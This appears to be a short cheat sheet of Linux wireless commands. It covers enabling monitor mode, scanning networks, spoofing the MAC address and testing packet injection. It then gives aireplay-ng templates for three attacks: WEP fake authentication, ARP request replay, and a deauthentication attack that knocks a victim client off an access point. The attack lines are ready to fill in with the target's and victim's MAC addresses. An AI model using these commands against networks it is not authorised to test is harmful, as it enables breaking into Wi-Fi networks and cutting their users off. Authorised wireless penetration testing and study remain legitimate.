native
# create new interface in monitor mode
sudo iw dev wlan0 interface add mon0 type monitor
# bring up the new interface
sudo ifconfig mon0 up
# check inteface status
iwconfig mon0
# verify traffic with tcpdump
sudo tcpdump -i mon0 -s 65000 -p
# delete new interface
sudo iw dev mon0 interface del
# confirm that interface is gone
iwconfig mon0
airmon-ng start/stop interface in monitor mode
airmon-ng start wlan0
airmon-ng stop [phy0]wlan0mon
Check SSIDs and channels
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID"
get/change mac address
macchanger -s wlan0mon
Test if wireless card supports packet injection
aireplay-ng -9 wlan0mon
Two card injection test
aireplay-ng -9 -i wlan1 wlan0mon
fake authentication attack (WEP)
- this attack does not generate ARP packets
aireplay-ng -1 0 -e <ESSID> -a <MACADDROFACCESSPT> -h <MYMACADDR> wlan0mon
arp request replay attack
aireplay-ng -3 -b <MACADDROFACCESSPT> -h <MYMACADDR or VICTIMMACADDR> wlan0mon
deauthentication attack
aireplay-ng -0 1 -a <MACADDROFACCESSPT> -c <MACADDROFVICTIM> wlan0mon